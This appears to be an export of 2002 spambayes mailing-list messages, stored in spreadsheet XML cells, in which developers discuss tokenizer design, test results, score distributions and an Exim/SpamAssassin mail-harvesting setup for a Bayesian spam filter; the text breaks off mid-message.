interesting.  The tiny spam/ham collections in GBayes are also worthless
now.  The "self test" feature didn't do anything except print its results;
Tester.py since became doctest'ed and verifies that some basic machinery
actually delivers what it's supposed to deliver.&gt; Therefore I propose to nuke GBayes.py, after adding a -u feature.+1 here.&gt; Anyone against?</t>
  </si>
  <si>
    <t>Just curious if subject line capitalization can be used as an indicator.Either the percentage of characters that are caps..Or, percentage starting with a capital letter (if number of words &gt; xx)Brad Clements,                bkc@murkworks.com   (315)268-1000
http://www.murkworks.com                          (315)268-9812 Fax
AOL-IM: BKClements</t>
  </si>
  <si>
    <t>[Brad Clements]
&gt; Just curious if subject line capitalization can be used as an indicator.
&gt;
&gt; Either the percentage of characters that are caps..
&gt;
&gt; Or, percentage starting with a capital letter (if number of words &gt; xx)Supply a mod to tokenizer.py and I'll test it (eventually ).  Note
that the tokenizer already *preserves* case in subject-line words, because
experiment showed that this was better than folding case away in this
specific context (but experiment also showed-- against my
expectations --that preserving case everywhere didn't make a significant
difference to either error rate -- the subject line is a special case for
this).</t>
  </si>
  <si>
    <t xml:space="preserve">Tim Peters wrote:
&gt; If you've still got the summary files, please cvs up and try running cmp.py
&gt; again -- in the process of generalizing cmp.py, you managed to make it skip
&gt; half the lines .Woops.  I didn't have the summary files so I regenerated them using a
slightly different set of data.  Here are the results of enabling the
"received" header processing:    false positive percentages
        0.707  0.530  won    -25.04%
        0.873  0.524  won    -39.98%
        0.301  0.301  tied
        1.047  1.047  tied
        0.602  0.452  won    -24.92%
        0.353  0.177  won    -49.86%    won   4 times
    tied  2 times
    lost  0 times    total unique fp went from 17 to 14 won    -17.65%    false negative percentages
        2.167  1.238  won    -42.87%
        0.969  0.969  tied
        1.887  1.372  won    -27.29%
        1.616  1.292  won    -20.05%
        1.029  0.858  won    -16.62%
        1.548  1.548  tied    won   4 times
    tied  2 times
    lost  0 times    total unique fn went from 50 to 38 won    -24.00%My test set is different than Tim's in that all the email was received
by the same account.  Also, my set contains email sent to me, not to
mailing lists (I use a different addresses for mailing lists).  If
people cook up more ideas I will be happy to test them.  Neil
</t>
  </si>
  <si>
    <t>[Tim]
&gt; ...
&gt; On my box the current system scores about 50 msgs per second (starting
&gt; in memory, of course).That was a guess.  Bothering to get a clock out, it was more like 80 per
second.  See?  A 60% speedup without changing a thing .</t>
  </si>
  <si>
    <t>[Neil Schemenauer]
&gt; Woops.  I didn't have the summary files so I regenerated them using a
&gt; slightly different set of data.  Here are the results of enabling the
&gt; "received" header processing:
&gt;
&gt;     false positive percentages
&gt;         0.707  0.530  won    -25.04%
&gt;         0.873  0.524  won    -39.98%
&gt;         0.301  0.301  tied
&gt;         1.047  1.047  tied
&gt;         0.602  0.452  won    -24.92%
&gt;         0.353  0.177  won    -49.86%
&gt;
&gt;     won   4 times
&gt;     tied  2 times
&gt;     lost  0 times
&gt;
&gt;     total unique fp went from 17 to 14 won    -17.65%
&gt;
&gt;     false negative percentages
&gt;         2.167  1.238  won    -42.87%
&gt;         0.969  0.969  tied
&gt;         1.887  1.372  won    -27.29%
&gt;         1.616  1.292  won    -20.05%
&gt;         1.029  0.858  won    -16.62%
&gt;         1.548  1.548  tied
&gt;
&gt;     won   4 times
&gt;     tied  2 times
&gt;     lost  0 times
&gt;
&gt;     total unique fn went from 50 to 38 won    -24.00%
&gt;
&gt; My test set is different than Tim's in that all the email was received
&gt; by the same account.  Also, my set contains email sent to me, not to
&gt; mailing lists (I use a different addresses for mailing lists).Enabling the Received headers works even better for me ; here's the
f-n section from a quick run on 500-element subsets:    0.600  0.200  won    -66.67%
    0.200  0.200  tied
    0.200  0.000  won   -100.00%
    0.800  0.400  won    -50.00%
    0.400  0.200  won    -50.00%
    0.400  0.000  won   -100.00%
    0.200  0.000  won   -100.00%
    1.000  0.400  won    -60.00%
    0.800  0.200  won    -75.00%
    1.200  0.600  won    -50.00%
    0.400  0.200  won    -50.00%
    2.000  0.800  won    -60.00%
    0.400  0.400  tied
    1.200  0.600  won    -50.00%
    0.400  0.000  won   -100.00%
    2.000  1.000  won    -50.00%
    0.400  0.000  won   -100.00%
    0.800  0.000  won   -100.00%
    0.000  0.200  lost  +(was 0)
    0.400  0.000  won   -100.00%won  17 times
tied  2 times
lost  1 timestotal unique fn went from 38 to 15 won    -60.53%A huge improvement, but for wrong reasons ... except not entirely!  The most
powerful discriminator in the whole database on one training set became:        'received:unknown' 881 0.99That's got nothing to do with BruceG, right?        'received:bfsmedia.com'was also a strong spam indicator across all training sets.  I'm jealous.&gt; If people cook up more ideas I will be happy to test them.Neil, are using your own tokenizer now, or the tokenizer.Tokenizer.tokenize
generator?  Whichever, someone who's not afraid of their headers should try
adding mboxtest.MyTokenizer.tokenize_headers into the mix, once in lieu of
tokenizer.Tokenizer.tokenize_headers(), and again in addition to it.  Jeremy
reported on just the former.</t>
  </si>
  <si>
    <t xml:space="preserve">On 07 September 2002, Guido van Rossum said:
&gt; If and when we package this, perhaps we should use Barry's trick
&gt; from the email package for making the package itself the toplevel dir
&gt; of the distribution (rather than requiring an extra directory level
&gt; just so the package can be a subdir of the distro).It's not a *trick*!  It just requires this  package_dir = {'spambayes': '.'}in the setup script.harrumph!  "trick" indeed...        Greg
-- 
Greg Ward                          http://www.gerg.ca/
A committee is a life form with six or more legs and no brain.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I'd prefer to strip HTML tags from everything, but last time I tried
&gt; that it still had bad effects on the error rates in my corporaYour corpora are biased in this respect though -- newsgroups have a
strong social taboo on posting HTML, but in many people's personal
inboxes it is quite abundant.Getting a good ham corpus may prove to be a bigger hurdle than I
though!  My own saved mail doesn't reflect what I receive, since I
save and throw away selectively (much more so than in the past :-).&gt; &gt;   multipart/mixed
&gt; &gt;       text/plain        (brief text plus URL(s))
&gt; &gt;       text/html         (long HTML copied from website)
&gt; 
&gt; Ah!  That explains why the HTML tags didn't get stripped.  I'd again
&gt; offer to add an optional argument to tokenize() so that they'd get
&gt; stripped here too, but if it gets glossed over a third time that
&gt; would feel too much like a loss .I'll bite.  Sounds like a good idea to strip the HTML in this case;
I'd like to see how this improves the f-p rate on this corpus.--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t>[Tim]
&gt;&gt; I'd prefer to strip HTML tags from everything, but last time I tried
&gt;&gt; that it still had bad effects on the error rates in my corpora[Guido]
&gt; Your corpora are biased in this respect though -- newsgroups have a
&gt; strong social taboo on posting HTML, but in many people's personal
&gt; inboxes it is quite abundant.We're in violent agreement there:  the comments in tokenizer.py say that as
strongly as possible, and I've repeated it endlessly here too.  But so long
as I was the only one doing serious testing, it was a dubious idea to make
the code maximally clumsy for me to use on the c.l.py task .&gt; Getting a good ham corpus may prove to be a bigger hurdle than I
&gt; though!  My own saved mail doesn't reflect what I receive, since I
&gt; save and throw away selectively (much more so than in the past :-).Yup, the system picks up on *everything* in the tokens.  Graham's proposed
"delete as ham" and "delete as spam" keys would probably work very well for
motivated geeks.  But Paul Svensson has pointed out here that they probably
wouldn't work nearly so well for real people.&gt;&gt; Ah!  That explains why the HTML tags didn't get stripped.  I'd again
&gt;&gt; offer to add an optional argument to tokenize() so that they'd get
&gt;&gt; stripped here too, but if it gets glossed over a third time that
&gt;&gt; would feel too much like a loss .&gt; I'll bite.  Sounds like a good idea to strip the HTML in this case;
&gt; I'd like to see how this improves the f-p rate on this corpus.I'll soon check in this change:    def tokenize_body(self, msg, retain_pure_html_tags=False):
                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^
        """Generate a stream of tokens from an email Message.        If a multipart/alternative section has both text/plain and text/html
        sections, the text/html section is ignored.  This may not be a good
        idea (e.g., the sections may have different content).        HTML tags are always stripped from text/plain sections.        By default, HTML tags are also stripped from text/html sections.
        However, doing so hurts the false negative rate on Tim's
        comp.lang.python tests (where HTML-only messages are almost never
        legitimate traffic).  If optional argument retain_pure_html_tags
        is specified and True, HTML tags are retained in text/html sections.
        """You should do a cvs up and establish a new baseline first, as I checked in a
pure-win change in the wee hours that cut the fp and fn rates in my tests.</t>
  </si>
  <si>
    <t xml:space="preserve">
    &gt;&gt; If and when we package this, perhaps we should use Barry's trick ...    Greg&gt; It's not a *trick*!  It just requires this    Greg&gt;   package_dir = {'spambayes': '.'}    Greg&gt; in the setup script.That has the nasty side effect of placing all .py files in the package.
What about obvious executable scripts (like timtest or hammie)?  How can I
keep them out of the package?Skip</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; That has the nasty side effect of placing all .py files in the
&gt; package.  What about obvious executable scripts (like timtest or
&gt; hammie)?  How can I keep them out of the package?Why would we care about installing a few extra files, as long as
they're inside a package?--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t>[Skip Montanaro]
&gt; That has the nasty side effect of placing all .py files in the package.
&gt; What about obvious executable scripts (like timtest or hammie)?  How can I
&gt; keep them out of the package?Put them in a scripts folder?// m-</t>
  </si>
  <si>
    <t xml:space="preserve">
Because I get mail through several different email addresses, I frequently
get duplicates (or triplicates or more-plicates) of various spam messages.
In saving spam for later analysis I haven't always been careful to avoid
saving such duplicates.I wrote a script some time ago to try an minimize the duplicates I see by
calculating a loose checksum, but I still have some duplicates.  Should I
delete the duplicates before training or not?  Would people be interested in
the script?  I'd be happy to extricate it from my local modules and check it
into CVS.Skip</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; "TP" == Tim Peters  writes:  &gt;&gt; First test results using tokenizer.Tokenizer.tokenize_headers()
  &gt;&gt; unmodified.  ...  Second test results using
  &gt;&gt; mboxtest.MyTokenizer.tokenize_headers().  This uses all headers
  &gt;&gt; except Received, Data, and X-From_.  ...  TP&gt; Try the latter again, but call the base tokenize_headers() too.Sorry.  I haven't found the time to try any more test runs.  Perhaps
later today.Jeremy</t>
  </si>
  <si>
    <t>[Skip Montanaro]
&gt; Because I get mail through several different email addresses, I
&gt; frequently get duplicates (or triplicates or more-plicates) of
&gt; various spam messages.  In saving spam for later analysis I haven't
&gt; always been careful to avoid saving such duplicates.
&gt;
&gt; I wrote a script some time ago to try an minimize the duplicates I see
&gt; by calculating a loose checksum, but I still have some duplicates.
&gt; Should I delete the duplicates before training or not?People just can't stop thinking .  The classifier should work best
when trained on a wholly random spattering of real life.  If real life
contains duplicates, then that's what the classifier should see.&gt; Would people be interested in the script?  I'd be happy to extricate
&gt; it from my local modules and check it into CVS.Sure!  I think it's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</si>
  <si>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 xml:space="preserve">
    Guido&gt; Why would we care about installing a few extra files, as long as
    Guido&gt; they're inside a package?I guess you needn't worry about that.  It just doesn't seem "clean" to me.S</t>
  </si>
  <si>
    <t xml:space="preserve">    &gt;&gt; I wrote a script some time ago to try an minimize the duplicates I
    &gt;&gt; see by calculating a loose checksum, but I still have some
    &gt;&gt; duplicates.  Should I delete the duplicates before training or not?    Tim&gt; People just can't stop thinking .  The classifier should work
    Tim&gt; best when trained on a wholly random spattering of real life.  If
    Tim&gt; real life contains duplicates, then that's what the classifier
    Tim&gt; should see.A bit more detail.  I get destined for many addresses: skip@pobox.com,
skip@calendar.com, concerts@musi-cal.com, webmaster@mojam.com, etc.  I
originally wrote (a slightly different version of) the loosecksum.py script
I'm about to check in to avoid manually scanning all those presumed spams
which are really identical.  Once a message was identified as spam, what I
refer to as a loose checksum was computed to try and avoid saving the same
spam multiple times for later review.    &gt;&gt; Would people be interested in the script?  I'd be happy to extricate
    &gt;&gt; it from my local modules and check it into CVS.    Tim&gt; Sure!  I think it's relevant, but maybe for another purpose.  Paul
    Tim&gt; Svensson is thinking harder about real people  than the rest
    Tim&gt; of us, and he may be able to get use out of approaches that
    Tim&gt; identify closely related spam.  For example, some amount of spam is
    Tim&gt; going to end up in the ham training data in real life use, and any
    Tim&gt; sort of similarity score to a piece of known spam may be an aid in
    Tim&gt; finding and purging it.I'll check it in.  Let me know if you find it useful.Skip</t>
  </si>
  <si>
    <t xml:space="preserve">On 09 September 2002, Tim Peters said:
&gt; &gt; Would people be interested in the script?  I'd be happy to extricate
&gt; &gt; it from my local modules and check it into CVS.
&gt; 
&gt; Sure!  I think it's relevant, but maybe for another purpose.  Paul Svensson
&gt; is thinking harder about real people  than the rest of us, and he may
&gt; be able to get use out of approaches that identify closely related spam.
&gt; For example, some amount of spam is going to end up in the ham training data
&gt; in real life use, and any sort of similarity score to a piece of known spam
&gt; may be an aid in finding and purging it.OTOH, look into DCC (Distributed Checksum Clearinghouse,
http://www.rhyolite.com/anti-spam/dcc/), which uses fuzzy checksums.
It's quite likely that DCC's checksumming scheme is better than
something any of us would throw together for personal use (no offense,
Skip!).  But I have no personal experience of it.        Greg
-- 
Greg Ward                          http://www.gerg.ca/
If it can't be expressed in figures, it is not science--it is opinion.
</t>
  </si>
  <si>
    <t xml:space="preserve">
    Greg&gt; OTOH, look into DCC (Distributed Checksum Clearinghouse,
    Greg&gt; http://www.rhyolite.com/anti-spam/dcc/), which uses fuzzy
    Greg&gt; checksums.  It's quite likely that DCC's checksumming scheme is
    Greg&gt; better than something any of us would throw together for personal
    Greg&gt; use (no offense, Skip!).None taken.  I wrote my little script before I was aware DCC existed.  Even
now, it seems like overkill for my use.Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">[followups to spambayes@python.org please, unless you're specifically
 concerned about some particular bit of email policy for python.org]OK, after much fiddling with and tweaking of /etc/exim/exim4.conf and
/etc/exim/local_scan.py on mail.python.org, I am fairly confident that
I can start harvesting all incoming email at a moment's notice.  For the
record, here's how it all works:  * exim4.conf works almost exactly the same as before if the file
    /etc/exim/harvest does not exist.  That is, any "junk mail
    condition" that can be detected by Exim ACLs (access control lists)
    is handled entirely in exim4.conf: the message is rejected before it
    ever gets to local_scan.py.  This covers such diverse cases as
    "message from known spammer" (reject after every RCPT TO command),
    "no message-id header", and "8-bit chars in subject" (both rejected
    after the message headers/body are read).    The main things I have changed in the absence of /etc/exim/harvest
    are:
      - don't check for 8-bit chars in "From" header -- the vast
        majority of hits for this test were bounces from some
        Asian ISP; the remaining hits should be handled by SpamAssassin
      - do header sender verification (ie. ensure that there's a
        verifiable email address in at least one of "From", "Reply-to",
        and "Sender") as late as possible, because it requires DNS
        lookups which can be slow (and can also make messages that
        should have been rejected merely be deferred, if those DNS
        lookups timeout)  * if /etc/exim/harvest exists, then the behaviour of all of those
    ACLs in exim4.conf suddenly changes: instead of rejecting recipients
    or messages, they add an X-reject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local_scan.py, which now
    looks for the X-reject header.  If found, it uses the folder name
    specified there to save the message, and then rejects it with the
    SMTP error message also given in X-reject.  (Currently X-reject is
    retained in saved messages.)    If a message was not tagged with X-reject, then local_scan.py
    runs the usual virus and spam checks.  (Namely, my homebrew
    scan for attachments with filenames that look like Windows
    executables, and a run through SpamAssassin.)  The logic is
    basically this:
      if virus:
          folder = "virus"
      else:
          run through SpamAssassin
          if score &gt;= 10.0:
              folder = "rejected-spam"
          elif score &gt;= 5.0:
              folder = "caught-spam"    Finally, local_scan.py writes the message to the designated folder.
    By far the biggest folder will be "accepted" -- the server handles
    2000-5000 incoming messages per day, of which maybe 100-500 are junk
    mail.  (Oops, just realized I haven't written the code that actually
    saves the message -- d'ohh!  Also haven't written anything to
    discriminate personal email, which I must do.  Sigh.)  * finally, the big catch: waiting until after you've read the message
    headers and body to actually reject the message is problematic,
    because certain broken MTAs (including those used by some spammers)
    don't consider a 5xx after DATA as a permanent error, but keep
    retrying.  D'ohh.  This is a minor annoyance currently, where a fair
    amount of stuff is rejected at RCPT TO time.  But in harvest mode,
    *everything* (with the exception of people probing for open relays)
    will be rejected at DATA time.  So I have cooked up something called
    the ASBL, or automated sender blacklist.  This is just a Berkeley DB
    file that maps (sender_ip, sender_address) to an expiry time.  When
    local_scan() rejects a message from (sender_ip, sender_address) --
    for whatever reason, including finding an X-reject header added by
    an ACL in exim4.conf -- it adds a record to the ASBL, with an expiry
    time 3 hours in the future.  Meanwhile, there's an ACL in exim4.conf
    that checks for records in the ASBL; if there's a record for the
    current (sender_ip, sender_address) that hasn't expired yet, we
    reject all recipients without ever looking at the message headers or
    body.    The downside of this from the point-of-view of corpus collection is
    that if some jerk is busily spamming *@python.org, one SMTP
    connection per address, we will most likely only get one copy.  This
    is a win if you're just thinking about reducing server load and
    bandwidth, but I'm not sure if it's helpful for training spam
    detectors.  Tim?Happy harvesting --        Greg
-- 
Greg Ward                          http://www.gerg.ca/
Budget's in the red?  Let's tax religion!
    -- Dead Kennedys
</t>
  </si>
  <si>
    <t>We've not only reduced the f-p and f-n rates in my test runs, we've also
made the score distributions substantially sharper.  This is bad news for
Greg, because the non-existent "middle ground" is becoming even less
existent :Ham distribution for all runs:
* = 1333 items
  0.00 79975 ************************************************************
  2.50     1 *
  5.00     0
  7.50     0
 10.00     2 *
 12.50     1 *
 15.00     0
 17.50     0
 20.00     0
 22.50     1 *
 25.00     0
 27.50     0
 30.00     0
 32.50     0
 35.00     0
 37.50     1 *
 40.00     0
 42.50     0
 45.00     0
 47.50     0
 50.00     0
 52.50     0
 55.00     0
 57.50     0
 60.00     1 *
 62.50     0
 65.00     1 *
 67.50     0
 70.00     0
 72.50     0
 75.00     0
 77.50     0
 80.00     0
 82.50     0
 85.00     0
 87.50     0
 90.00     0
 92.50     0
 95.00     0
 97.50    17 *Spam distribution for all runs:
* = 914 items
  0.00   118 *
  2.50     7 *
  5.00     0
  7.50     2 *
 10.00     1 *
 12.50     1 *
 15.00     3 *
 17.50     1 *
 20.00     1 *
 22.50     1 *
 25.00     0
 27.50     0
 30.00     4 *
 32.50     3 *
 35.00     4 *
 37.50     2 *
 40.00     0
 42.50     1 *
 45.00     1 *
 47.50     0
 50.00     2 *
 52.50     3 *
 55.00     1 *
 57.50     2 *
 60.00     0
 62.50     1 *
 65.00     1 *
 67.50    10 *
 70.00     2 *
 72.50     1 *
 75.00     2 *
 77.50     1 *
 80.00     0
 82.50     0
 85.00     1 *
 87.50     4 *
 90.00     2 *
 92.50     5 *
 95.00    14 *
 97.50 54806 ************************************************************As usual for me, this is an aggregate of 20 runs, each both training and
predicting on 4000 c.l.py ham + ~2750 BruceG spam.Only 25 ham scores out of 80,000 are above 0.025 now (and, yes, the
"Nigerian scam"-quoting msg is still counted as ham -- I haven't taken
anything out of the ham corpus since remving the "If AOL were a car" spam),
the f-p rate wouldn't have changed at all if the spamprob cutoff were
dropped from 0.90 to 0.675, dropping the cutoff to 0.40 would have added
only 2 false positives, and dropping it to 0.15 would have added only
another 2 more!It's spooky.</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt; Tim Peters wrote
&gt; We've not only reduced the f-p and f-n rates in my test runs, we've also
&gt; made the score distributions substantially sharper.  This is bad news for
&gt; Greg, because the non-existent "middle ground" is becoming even less
&gt; existent :Well, I've finally got around to pulling down the SF code. Starting
with it, and absolutely zero local modifications, I see the following:Ham distribution for all runs:
* = 589 items
  0.00 35292 ************************************************************
  2.50    36 *
  5.00    21 *
  7.50    12 *
 10.00     6 *
 12.50     9 *
 15.00     6 *
 17.50     3 *
 20.00     8 *
 22.50     5 *
 25.00     3 *
 27.50    18 *
 30.00     9 *
 32.50     1 *
 35.00     4 *
 37.50     3 *
 40.00     0 
 42.50     3 *
 45.00     3 *
 47.50     4 *
 50.00     9 *
 52.50     5 *
 55.00     5 *
 57.50     3 *
 60.00     4 *
 62.50     2 *
 65.00     2 *
 67.50     6 *
 70.00     1 *
 72.50     3 *
 75.00     2 *
 77.50     4 *
 80.00     3 *
 82.50     3 *
 85.00     6 *
 87.50     8 *
 90.00     4 *
 92.50     8 *
 95.00    15 *
 97.50   441 *Spam distribution for all runs:
* = 504 items
  0.00   393 *
  2.50    17 *
  5.00    18 *
  7.50    12 *
 10.00     4 *
 12.50     6 *
 15.00    11 *
 17.50    10 *
 20.00    10 *
 22.50     5 *
 25.00     3 *
 27.50    19 *
 30.00     8 *
 32.50     2 *
 35.00     0 
 37.50     1 *
 40.00     5 *
 42.50     5 *
 45.00     7 *
 47.50     2 *
 50.00     5 *
 52.50     1 *
 55.00     9 *
 57.50    11 *
 60.00     6 *
 62.50     4 *
 65.00     3 *
 67.50     5 *
 70.00     7 *
 72.50     9 *
 75.00     2 *
 77.50    13 *
 80.00     3 *
 82.50     7 *
 85.00    15 *
 87.50    16 *
 90.00    11 *
 92.50    16 *
 95.00    45 *
 97.50 30226 ************************************************************
My next (current) task is to complete the corpus I've got - it's currently
got ~ 9000 ham, 7800 spam, and about 9200 currently unsorted. I'm tossing 
up using either hammie or spamassassin to do the initial sort  - previously
I've used various forms of 'grep' for keywords and a little gui thing to 
pop a message up and let me say 'spam/ham', but that's just getting too, too
tedious.I can't make it available en masse, but I will look at finding some of
the more 'interesting' uglies. One thing I've seen (consider this 
'anecdotal' for now) is that the 'skip' tokens end up in a _lot_ of the 
f-ps.Anthony
</t>
  </si>
  <si>
    <t xml:space="preserve">
After my latest cvs up, timtest fails with    Traceback (most recent call last):
      File "/home/skip/src/spambayes/timtest.py", line 294, in ?
        drive(nsets)
      File "/home/skip/src/spambayes/timtest.py", line 264, in drive
        d = Driver()
      File "/home/skip/src/spambayes/timtest.py", line 152, in __init__
        self.global_ham_hist = Hist(options.nbuckets)
    AttributeError: 'OptionsClass' object has no attribute 'nbuckets'I'm running it as    timtest -n5 &gt; Data/timtest.outfrom my ~/Mail directory (not from my ~/src/spambayes directory).  If I
create a symlink to ~/src/spambayes/bayes.ini it works once again, but
shouldn't there be an nbuckets attribute with a default value already?Skip</t>
  </si>
  <si>
    <t>[Skip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t>
  </si>
  <si>
    <t>[Tim]
&gt; I never used ConfigParser before, but I read that its read() 
&gt; method silently ignores files that don't exist.  If 'bayes.ini'
&gt; isn't found, *none* of the options will be defined. ...Note that I since got rid of bayes.ini (it's embedded in Options.py 
now), so search-path issues won't burn you here anymore.  The intended 
way to customize the tokenizer and testers is via creating your own 
bayescustomize.ini.  You'll get burned by search-path issues wrt that 
instead now &lt;0.7 wink&gt;.</t>
  </si>
  <si>
    <t>[Anthony Baxter]
&gt; Well, I've finally got around to pulling down the SF code. Starting
&gt; with it, and absolutely zero local modifications, I see the following:How many runs is this summarizing?  For each, how many ham&amp;spam were in the
training set?  How many in the prediction sets?  What were the error rates
(run rates.py over your output file)?The effect of set sizes on accuracy rates isn't known.  I've informally
reported some results from just a few controlled experiments on that.
Jeremy reported improved accuracy by doubling the training set size, but
that wasn't a controlled experiment (things besides just training set size
changed between "before" and "after").&gt; Ham distribution for all runs:
&gt; * = 589 items
&gt;   0.00 35292 ************************************************************
&gt;   2.50    36 *
&gt;   5.00    21 *
&gt;   7.50    12 *
&gt;  10.00     6 *
&gt; ...
&gt;  90.00     4 *
&gt;  92.50     8 *
&gt;  95.00    15 *
&gt;  97.50   441 *
&gt;
&gt; Spam distribution for all runs:
&gt; * = 504 items
&gt;   0.00   393 *
&gt;   2.50    17 *
&gt;   5.00    18 *
&gt;   7.50    12 *
&gt;  10.00     4 *
&gt; ...
&gt;  90.00    11 *
&gt;  92.50    16 *
&gt;  95.00    45 *
&gt;  97.50 30226 ************************************************************
&gt;
&gt;
&gt; My next (current) task is to complete the corpus I've got - it's currently
&gt; got ~ 9000 ham, 7800 spam, and about 9200 currently unsorted. I'm tossing
&gt; up using either hammie or spamassassin to do the initial sort  -
previously
&gt; I've used various forms of 'grep' for keywords and a little gui thing to
&gt; pop a message up and let me say 'spam/ham', but that's just getting too,
too
&gt; tedious.Yup, tagging data is mondo tedious, and mistakes hurt.I expect hammie will do a much better job on this already than hand
grepping.  Be sure to stare at the false positives and get the spam out of
there.&gt; I can't make it available en masse, but I will look at finding some of
&gt; the more 'interesting' uglies. One thing I've seen (consider this
&gt; 'anecdotal' for now) is that the 'skip' tokens end up in a _lot_ of the
&gt; f-ps.With probabilities favoring ham or spam?  A skip token is produced in lieu
of "word" more than 12 chars long and without any high-bit characters.  It's
possible that they helped me because raw HTML produces lots of these.
However, if you're running current CVS, Tokenizer/retain_pure_html_tags
defaults to False now, so HTML decorations should vanish before body
tokenization.</t>
  </si>
  <si>
    <t>[Tim]
&gt; ...
&gt; At the other extreme, training on half my ham&amp;spam, and scoring aginst
&gt; the other half
&gt; ...
&gt;     false positive rate: 0.0100%
&gt;     false negative rate: 0.3636%
&gt; ...
&gt; Alas, all 4 of the 0.99 clues there are HTML-related.That begged to try it again but with Tokenize/retain_pure_html_tags false.
The random halves getting trained on and scored against are different here,
and I repaired the bug that dropped 1 ham and 1 spam on the floor, so this
isn't exactly a 1-change difference between runs.Ham distribution for all runs:
* = 167 items
  0.00 9999 ************************************************************
 10.00    0
 20.00    0
 30.00    0
 40.00    0
 50.00    0
 60.00    0
 70.00    0
 80.00    0
 90.00    1 *Spam distribution for all runs:
* = 115 items
  0.00   21 *
 10.00    0
 20.00    0
 30.00    1 *
 40.00    0
 50.00    0
 60.00    1 *
 70.00    0
 80.00    1 *
 90.00 6852 ************************************************************    false positive rate: 0.0100%
    false negative rate: 0.3490%Yay!  That may mean that HTML tags aren't really needed in my test data
provided it's trained on enough stuff.  Curiously, the sole false positive
here is the same as the sole false positive on the half&amp;half run reported in
the preceding msg (I assume the Nigerian scam "false positive" just happened
to end up in the training data both times):************************************************************************
Data/Ham/Set4/107687.txt
prob = 0.999632042904
prob('python.') = 0.01
prob('alteration') = 0.01
prob('edinburgh') = 0.01
prob('subject:Python') = 0.01
prob('header:Errors-To:1') = 0.0216278
prob('thanks,') = 0.0319955
prob('help?') = 0.041806
prob('road,') = 0.0462364
prob('there,') = 0.0722794
prob('us.') = 0.906609
prob('our') = 0.919118
prob('company,') = 0.921852
prob('visit') = 0.930785
prob('sent.') = 0.939882
prob('e-mail') = 0.949765
prob('courses') = 0.954726
prob('received') = 0.955209
prob('analyst') = 0.960756
prob('investment') = 0.975139
prob('regulated') = 0.99
prob('e-mails') = 0.99
prob('mills') = 0.99Received: from [195.171.5.71] (helo=node401.dmz.standardlife.com)
        by mail.python.org with esmtp (Exim 3.21 #1)
        id 15rDsu-00085k-00
        for python-list@python.org; Wed, 10 Oct 2001 03:34:32 -0400
Received: from slukdcn4.internal.standardlife.com (slukdcn4.standardlife.com
        [10.3.2.72])
        by node401.dmz.standardlife.com (Pro-8.9.3/Pro-8.9.3) with SMTP id
        IAA53660for ; Wed, 10 Oct 2001 08:34:00
+0100
Received: from sl079320 ([172.31.88.231]) by
        slukdcn4.internal.standardlife.com (Lotus SMTP MTA v4.6.6  (890.1
7-16-1999))
        with SMTP id 80256AE1.00294B60; Wed, 10 Oct 2001 08:31:02 +0100
Message-ID:
&lt;007e01c1515d$bb255940$e7581fac@sl079320.internal.standardlife.com&gt;
From: "Vickie Mills" 
To: 
Subject: Training Courses in Python in UK
Date: Wed, 10 Oct 2001 08:32:30 +0100
MIME-Version: 1.0
Content-Type: text/plain;
        charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3155.0
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0
Sender: python-list-admin@python.org
Errors-To: python-list-admin@python.org
X-BeenThere: python-list@python.org
X-Mailman-Version: 2.0.6 (101270)
Precedence: bulk
List-Help: 
List-Post: 
List-Subscribe: ,
List-Id: General discussion list for the Python programming language
List-Unsubscribe: ,
List-Archive: Hi there,I am looking for you recommendations on training courses available in the UK
on Python.  Can you help?Thanks,Vickie Mills
IS Training AnalystTel:    0131 245 1127
Fax:    0131 245 1550
E-mail:    vickie_mills@standardlife.comFor more information on Standard Life, visit our website
http://www.standardlife.com/   The Standard Life Assurance Company, Standard
Life House, 30 Lothian Road, Edinburgh EH1 2DH, is registered in Scotland
(No SZ4) and regulated by the Personal Investment Authority.  Tel: 0131 225
2552 - calls may be recorded or monitored.  This confidential e-mail is for
the addressee only.  If received in error, do not retain/copy/disclose it
without our consent and please return it to us.  We virus scan all e-mails
but are not responsible for any damage caused by a virus or alteration by a
third party after it is sent.
************************************************************************The top 30 discriminators are more interesting now:        'income' 629 0.99
        'http0:python' 643 0.01
        'header:MiME-Version:1' 672 0.99
        'http1:remove' 693 0.99
        'content-type:text/html' 711 0.982345
        'string' 714 0.01
        'http&gt;1:jpg' 776 0.99
        'object' 813 0.01
        'python,' 852 0.01
        'python.' 882 0.01
        'language' 883 0.01
        '&gt;&gt;&gt;' 907 0.01
        'header:Return-Path:2' 907 0.99
        'unsubscribe' 975 0.99
        'header:Received:7' 1113 0.99
        'def' 1142 0.01
        'http&gt;1:gif' 1168 0.99
        'module' 1169 0.01
        'import' 1332 0.01
        'header:Received:8' 1342 0.99
        'header:Errors-To:1' 1377 0.0216278
        'header:In-Reply-To:1' 1402 0.01
        'wrote' 1753 0.01
        'Â ' 2067 0.99
        'subject:Python' 2140 0.01
        'header:User-Agent:1' 2322 0.01
        'header:X-Complaints-To:1' 4351 0.01
        'wrote:' 4370 0.01
        'python' 4972 0.01
        'header:Organization:1' 6921 0.01There are still two HTML clues remaining there ("Â " and
"content-type:text/html").  Anthony's trick accounts for almost a third of
these.  "Python" appears in 5 of them ('http0:python' means that 'python'
was found in the 1st field of an embedded http:// URL).  Sticking a .gif or
a .jpg in  a URL both score as 0.99 spam clues.  Note the damning pattern of
capitalization in 'header:MiME-Version:1'!  This counting is case-sensitive,
and nobody ever would have guessed that MiME is more damning than SUBJECT or
DATE.  Why would spam be likely to end up with two instances of Return-Path
in the headers?</t>
  </si>
  <si>
    <t xml:space="preserve">I've been running hammie on all my incoming messages, and I noticed that
multipart/alternative messages are totally hosed: they have no content,
just the MIME boundaries.  For instance, the following message:------------------------------8&lt;------------------------------
From: somebody 
To: neale@woozle.org
Subject: Booga
Content-type: multipart/alternative; boundary="snot"This is a multi-part message in MIME format.--snot
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BITHi there.
--snot
